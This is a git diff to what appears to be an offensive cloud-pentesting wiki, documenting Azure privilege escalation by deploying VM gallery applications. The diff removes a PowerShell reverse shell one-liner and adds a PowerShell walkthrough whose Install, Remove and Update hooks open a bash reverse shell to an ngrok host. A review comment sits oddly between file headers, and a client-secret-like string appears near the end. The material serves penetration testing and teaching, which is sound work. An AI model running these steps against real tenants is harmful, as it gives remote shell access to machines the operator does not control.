diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md index 4e7bd63f7..c3a1c4890 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md @@ -232,11 +232,6 @@ export URL_PACKAGE=$(az storage blob generate-sas \ --https-only \ --full-uri \ -o tsv) - -# Alternative commands for Powrhsell reverse shell -## Note that this would be detected by Defender (but it's an extarting point) -## Add in the install, remove and update commands -echo '$client = New-Object System.Net.Sockets.TCPClient(\"6.tcp.eu.ngrok.io\",19507);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64 ``` {{#endtab }} 
@@ -280,6 +275,109 @@ az vm application set \
 --name deleteme-win4 \
 --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellAppWin/versions/1.0.0 \
 --treat-deployment-as-failure true
+
+# You can create a SAS URL from a blob with something like:
+export EXPIRY=$(date -u -v +1d '+%Y-%m-%dT%H:%MZ')
+export URL_PACKAGE=$(az storage blob generate-sas \
+ --account-name \
+ --container-name \
+ --name \
+ --permissions r \
+ --expiry "$EXPIRY" \
+ --https-only \
+ --full-uri \
+ -o tsv)
+```
+
+{{#endtab }}
+
+{{#tab name="Az" }}
+
+```bash
+##### GET VM #####
+
+Get-AzVm
+# Check that location is "Central US", the gallery and app mUST be in the same location
+
+$vmName="vm-name"
+
+
+
+##### CREATE SAS TOKEN TO USE IN A USELESS BLOB #####
+
+$rg="rg-name"
+
+# Get and set storage account
+Get-AzStorageAccount
+
+$accountName = "account-name"
+
+# Get and set container inside the storage
+Get-AzStorageContainer -Context (Get-AzStorageAccount -name $accountName -ResourceGroupName $rg).context
+
+$containerName = "container-name"
+
+# Upload dummy file
+$key = (Get-AzStorageAccountKey -ResourceGroupName $rg -Name $accountName)[0].Value
+$ctx = New-AzStorageContext -StorageAccountName $accountName -StorageAccountKey $key
+echo "test" > /tmp/test.txt
+$blobName = "test.txt"
+Set-AzStorageBlobContent -File /tmp/test.txt -Container $containerName -Blob "$blobName" -Context $ctx
+
+# Generate SAS token
+$expiry = (Get-Date).ToUniversalTime().AddDays(1).ToString("yyyy-MM-ddTHH:mmZ")
+$sasToken = New-AzStorageBlobSASToken `
+ -Container $containerName `
+ -Blob $blobName `
+ -Permission r `
+ -ExpiryTime $expiry `
+ -FullUri `
+ -Context $ctx
+
+
+
+##### CREATE GALLERY AND APP #####
+
+$rg = "rg-name"
+$location = "Central US"
+$galleryName = "myGallery"
+$appName = "myReverseShellApp"
+$subscription="subscription-id"
+
+# Create gallery
+New-AzGallery 
-ResourceGroupName $rg -Name $galleryName -Location $location
+
+# Create app in gallery
+New-AzGalleryApplication `
+ -ResourceGroupName $rg `
+ -GalleryName $galleryName `
+ -Name $appName `
+ -Location $location `
+ -SupportedOSType Linux
+
+
+# Create app version
+$versionName = "1.0.2"
+## create ngrok listener
+
+New-AzGalleryApplicationVersion `
+ -ResourceGroupName $rg `
+ -GalleryName $galleryName `
+ -GalleryApplicationName $appName `
+ -Name $versionName `
+ -Location $location `
+ -PackageFileLink "$sasToken" `
+ -Install "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/19334 0>&1'" `
+ -Remove "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/19334 0>&1'" `
+ -Update "bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/19334 0>&1'"
+
+
+# Launch app
+$appVersionId = "/subscriptions/$subscription/resourceGroups/$rg/providers/Microsoft.Compute/galleries/$galleryName/applications/$appName/versions/$versionName"
+$app = New-AzVmGalleryApplication -PackageReferenceId $appVersionId
+$vm = Get-AzVM -ResourceGroupName $rg -Name $vmName
+Add-AzVmGalleryApplication -VM $vm -GalleryApplication $app
+Update-AzVM -ResourceGroupName $rg -VM $vm
 ```
 {{#endtab }}
diff --git a/src/pentesting-cloud/azure-security/az-services/az-azuread.md b/src/pentesting-cloud/azure-security/az-services/az-azuread.md
index d01effdb4..6d387a0f8 100644
--- a/src/pentesting-cloud/azure-security/az-services/az-azuread.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-azuread.md
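Review bot: The added `export EXPIRY=$(date -u -v +1d '+%Y-%m-%dT%H:%MZ')` uses the BSD/macOS `-v` adjust flag, which GNU coreutils `date` rejects, so on Linux `$EXPIRY` ends up empty and `az storage blob generate-sas --expiry ""` receives an unusable expiry; the GNU spelling is `date -u -d '+1 day' '+%Y-%m-%dT%H:%MZ'`, so either show both or add `# macOS date syntax; on GNU/Linux use: date -u -d '+1 day' '+%Y-%m-%dT%H:%MZ'` above the line. In the new `Az` tab the fence is opened as ```` ```bash ```` although every line in it is PowerShell, so it should be tagged `powershell` for correct highlighting. `$rg` is assigned twice in that tab (`$rg="rg-name"` under the SAS-token section and `$rg = "rg-name"` under the gallery section); the second assignment is redundant and one of them should go, or the comment should say why both exist. `echo "test" > /tmp/test.txt` and `-File /tmp/test.txt` presume a Unix `/tmp`, so a portable temp path such as `[System.IO.Path]::GetTempFileName()` would make the snippet work from a Windows PowerShell session as well.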
@@ -101,7 +101,7 @@ Connect-AzAccount -Credential $creds
 # Connect with access token
 Connect-AzAccount -AccountId test@corp.onmicrosoft.com [-AccessToken $ManagementToken] [-GraphAccessToken $AADGraphToken] [-MicrosoftGraphAccessToken $MicrosoftGraphToken] [-KeyVaultAccessToken $KeyVaultToken]
-# If connecting with some metadata token just use "-AccountId asdasd@example.com" and it will work
+# If connecting with some metadata token, in "-AccountId" put the OID of the managed identity (get it from the JWT token)
 # Connect with Service principal/enterprise app secret
 $password = ConvertTo-SecureString 'KWEFNOIRFIPMWL.--DWPNVFI._EDWWEF_ADF~SODNFBWRBIF' -AsPlainText -Force